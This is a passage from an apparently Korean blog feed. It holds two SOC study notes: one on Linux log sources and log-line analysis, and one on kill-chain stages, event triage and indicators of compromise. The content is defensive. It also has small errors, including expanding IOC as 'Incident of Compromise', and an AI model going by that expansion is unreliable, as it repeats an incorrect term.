&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Audit Log&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;생성 주체:&lt;/span&gt; 커널 감사&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;저장 위치:&lt;/span&gt;&lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;/var/log/audit/&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;조작 가능성:&lt;/span&gt; 낮음~중간&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;신뢰 수준:&lt;/span&gt; 매우 높음&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;주요 활용:&lt;/span&gt; 명령어 실행, 파일 접근 등의 정밀 분석&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Telemetry&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;생성 주체:&lt;/span&gt; 보안 에이전트&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;저장 위치:&lt;/span&gt;클라우드, SIEM&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;조작 가능성:&lt;/span&gt; 낮음 (외부 저장)&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;신뢰 수준:&lt;/span&gt; 매우 높음&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;주요 활용:&lt;/span&gt; 프로세스 트리 (EDR), 네트워크 이상 감지&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[6-4] 로그 관리 방식&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;syslog &lt;/b&gt;(전통 방식)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;작동 원리:&lt;/span&gt; 애플리케이션이 &lt;b&gt;syslog()&lt;/b&gt; 함수를 호출하여 로그 전달&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;저장 형식:&lt;/span&gt; &lt;b&gt;/var/log/*&lt;/b&gt; 경로에 텍스트 파일로 저장&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;조회 방법:&lt;/span&gt; &lt;b&gt;cat, tail, grep&lt;/b&gt; 등의 텍스트 도구 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;특징:&lt;/span&gt; &lt;b&gt;logrotate&lt;/b&gt; 를 통해 파일 회전 및 압축 관리&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;journald &lt;/b&gt;(현대 방식)&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;작동 원리:&lt;/span&gt;&lt;span&gt; systemd 서비스가 직접 &lt;b&gt;journald&lt;/b&gt; 로 로그 전송&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;저장 형식:&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;b&gt;/run/log/journal &lt;/b&gt;에 바이터리 형식으로 저장&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;조회 방법:&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;b&gt;journalctl &lt;/b&gt;전용 명령어로만 조회 가능&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;특징:&lt;/span&gt;&lt;span&gt;&amp;nbsp;바이너리 구조로 빠른 검색과 메타데이터 포함 가능&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[6-5] 로그 구성 요소&lt;/b&gt;&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;835&quot; data-origin-height=&quot;71&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/llbHx/dJMcajojDKB/6UGYenxFeCh0ZWVyLNkk8K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/llbHx/dJMcajojDKB/6UGYenxFeCh0ZWVyLNkk8K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/llbHx/dJMcajojDKB/6UGYenxFeCh0ZWVyLNkk8K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FllbHx%2FdJMcajojDKB%2F6UGYenxFeCh0ZWVyLNkk8K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;835&quot; height=&quot;71&quot; data-origin-width=&quot;835&quot; data-origin-height=&quot;71&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #f89009;&quot;&gt;시간&lt;/span&gt;&lt;/b&gt; - 이벤트가 발생한 정확한 시간&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;Apr 18 15:27:55 &lt;/span&gt;&lt;/b&gt;&amp;rarr; 정상 업무 시간대인지, 직전/직후에 연관된 다른 행위가 있는지 파악하는 기준&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;호스트&lt;/span&gt; -&lt;/b&gt; 이벤트가 발생한 서버 식별&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;web03&lt;/b&gt; &amp;rarr; 자산의 중요도로 분석 우선 순위 결정&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #8a3db6;&quot;&gt;프로세스&lt;/span&gt;&lt;/b&gt; - 이벤트를 기록한 서비스와 PID(프로세스 ID)&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;sshd[21032]&lt;/b&gt; &amp;rarr; SSH 서비스가 기록 주체임을 확인&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;결과&lt;/span&gt;&lt;/b&gt; - 행위의 성공 여부&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;Failed password&lt;/b&gt; &amp;rarr; 성공 여부에 따라 위협의 심각도 결정&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;세부 정보&lt;/span&gt;&lt;/b&gt; - 어떤 계정으로 어디서 접근했는지에 대한 구체적인 데이터&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;root / 174.22.123.44&lt;/b&gt; &amp;rarr; root 계정으로 174.22.123.44 IP에서 접근함&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[6-6] 로그 해석의 핵심 context&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;사용자 context&lt;/b&gt; - 행위 주체는?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 일반 사용자, 관리자, VIP, 퇴사자의 계정... &amp;rarr; 위험도 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;자산 context&lt;/b&gt; - 발생한 서버는?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 인터넷에 노출된 웹 서버, 내부망의 핵심 데이터 서버... &amp;rarr; 자산의 중요도 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;시간 context&lt;/b&gt; - 발생한 시간은?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 정상 업무 시간, 야간/주말, 정기 배치 작업 시간&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;네트워크 context&lt;/b&gt; - 접속한 위치는?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 내부망, VPN, Bastion&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(점프 서버)&lt;/span&gt;을 통한 접근, 해외 IP, 신규 IP&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;변경 context&lt;/b&gt; - 사전에 승인 여부는?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 공식적인 점검, 최근 배포나 패치 작업과 연관된 행위&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.6&amp;nbsp;-&amp;nbsp;Linux&amp;nbsp;로그&amp;nbsp;기초.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Blue Team (SOC)/Linux Log Analysis</category>
      <category>Blue Team</category>
      <category>cert</category>
      <category>IR</category>
      <category>SoC</category>
      <category>방어팀</category>
      <category>보안 관제</category>
      <category>블루팀</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/68</guid>
      <comments>https://anbymata.tistory.com/68#entry68comment</comments>
      <pubDate>Sun, 19 Apr 2026 22:00:34 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.5 - 공격 시나리오</title>
      <link>https://anbymata.tistory.com/67</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[5-1] Cyber Kill Chain (사이버 공격의 흐름)&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. 초기 침투 (Initial Access)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;피싱 메일&lt;/b&gt; = 악성 메일 유포 및 유입&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;흔적:&lt;/span&gt; 악성 URL 클릭, 첨부파일 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;b&gt;Email Gateway:&lt;/b&gt; 헤더 분석을 통한 발신자 평판 이상 및 악성 파일 탐지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;b&gt;Proxy:&lt;/b&gt; 로그 내 알려진 C2 서버나 악성 도메인으로의 접속 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. 권한 확보 (Credential Access)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;인증정보 탈취&lt;/b&gt; = ID/PW 탈취 및 권한 확보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 시스템 접속 권한 확보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;흔적:&lt;/span&gt; 로그인 실패 폭증, MFA 우회 시도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;b&gt;SIEM (Auth Log):&lt;/b&gt; 특정 계정에 대한 Brute Force 공격 및 비정상적인 인증 패턴 감지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. 지속성 유지 (Persistence)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;비정상 로그인&lt;/b&gt; = 탈취한 계정으로 로그인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 공격 지속을 위한 거점 확보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;흔적:&lt;/span&gt; 물리적으로 불가능한 이동 시간 내 접속, 해외 IP 또는 신규 디바이스를 통한 세션 생성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;b&gt;SIEM (IdP):&lt;/b&gt; 계정 관리 시스템에서 새로운 접속 정보와 비정상 위치/시잔 접속 감지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. 내부 탐색 (Discovery)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 시스템 및 네트워크 정보 수집&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 더 가치 있는 정보를 찾는 과정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;흔적:&lt;/span&gt; Powershell을 이용한 정보 수집 명령 (whoami, netuser) 흔적, 관리자 도구 실행 및 파일 시스템 검색 행위&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;b&gt;EDR:&lt;/b&gt; 엔트포인트 내 비정상 프로세스 트리 및 명령 실행 기록 추적&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;5. 데이터 수집 (Collection)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 유출 및 파과할 핵심 데이터를 한곳에 집결&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;흔적:&lt;/span&gt; 단시간 내 대량의 파일 접근 및 특정 폴더로의 복사/압축 행위, 민감 데이터에 대한 접근 권한 오남용&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt;&lt;b&gt; EDR / 파일 서버 로그 / SIEM:&lt;/b&gt; 호스트 내 비정상적인 파일 접근 패턴 및 대규모 데이터 가공 행위&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;6. 외부 유출 (Exfiltration)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 수집한 데이터를 외부로 빼돌림&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 최종 목적 달성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;흔적:&lt;/span&gt; 알려지지 않은 외부 클라우드 스토리지로의 대용량 업로드, 비정상적인 포트를 통한 대규모 데이터 유출&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;span data-path-to-node=&quot;6,6,0,0&quot;&gt;&lt;/span&gt;&lt;span data-path-to-node=&quot;6,6,1,0&quot;&gt;&lt;b data-index-in-node=&quot;0&quot; data-path-to-node=&quot;6,6,1,0&quot;&gt;DLP, Proxy,&lt;/b&gt; &lt;b data-index-in-node=&quot;12&quot; data-path-to-node=&quot;6,6,1,0&quot;&gt;CASB, 방화벽:&lt;/b&gt; 네트워크 트래픽 로그 내 비정상적인 데이터 이동 감지&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[5-2] 이벤트 분석의 6요소&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Who &lt;/b&gt;- 어떤 계정인가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 일반인 vs 관리자 or VIP&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Where&lt;/b&gt; - 어디서 발생했는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 출발지 IP, 국가, 접속 디바이스&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;When&lt;/b&gt; - 언제 발생했는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 정상 업무 시간대 여부, 직전/직후 행위&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;What&lt;/b&gt; - 무엇을 했는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 로그인 후 접근한 시스템이나 데이터&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Impact&lt;/b&gt; - 얼마나 위험한가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 공격의 범위와 영향도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Action&lt;/b&gt; - 지금 당장 무엇을 해야 하는가?&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 계정 잠금, 세션 종료 등의 즉각 조치 필요 여부&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[5-3] IOC (Incident of Compromise)&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;IOC =&amp;nbsp;&lt;/b&gt;시스템이나 네트워크에 침해가 발생했음을 나타내는 위협 인텔리전스의 가장 기본적인 단위&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;주요 IOC 유형 (대표적인 흔적들)&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;-&lt;b&gt; IP 주소&lt;/b&gt; - 공격에 사용된 것으로 확인된 악성 C2(Command &amp;amp; Control) 서버의 주소&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;도메인&lt;/b&gt; - 사용자를 속이는 피싱 사이트나 악성 코드를 배포하는 도메인 정보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;파일 해시&lt;/b&gt; - 특정 악성코드 파일이 가진 고유의 지문값(MD5, SHA256...)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;이메일&lt;/b&gt; - 피싱 공격을 시도한 발신자의 주소 정보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;URL&lt;/b&gt; - 악성 스크립트가 포함된 링크나 payload 다운로드 경로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;SOC에서의 IOC 활용&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- 탐지 및 분석 (SIEM)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 외부에서 생성된 위협 정보를 평판 DB와 대조 &amp;rarr; 내부 네트워크에 동일한 IP나 도메인인 나타나는지 실시간으로 감지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- 자동화된 보강 (SOAR Enrichment)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; Alert 발생 시 SOAR가 자동으로 해당 IP나 파일 해시를 외부 위협 인텔리전스 피드와 대조 &amp;rarr; 위험도 즉시 판단&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- 지속적 업테이트&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 확인된 새 공격 패턴을 IOC로 등록 &amp;rarr; 위협 인텔리전스 피드를 최신 상태로 유지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.5 - 공격&amp;nbsp;시나리오.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[Blue Team] EP.6 - Linux 로그 기초. Continue...&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://anbymata.tistory.com/68&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://anbymata.tistory.com/68&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1776669036558&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;[Blue Team] EP.6 - Linux 로그 기초&quot; data-og-description=&quot;[6-1] Linux의 주요 관찰 행위 유형Auth &amp;amp; System (인증 및 권한)- 사용자 로그인/로그아웃 - SSH 접속이나 Console을 통한 접근 기록 확인- 권한 상승 - sudo나 su 명령을 통해 일반 사용자의 관리자 권한 획득&quot; data-og-host=&quot;anbymata.tistory.com&quot; data-og-source-url=&quot;https://anbymata.tistory.com/68&quot; data-og-url=&quot;https://anbymata.tistory.com/68&quot; 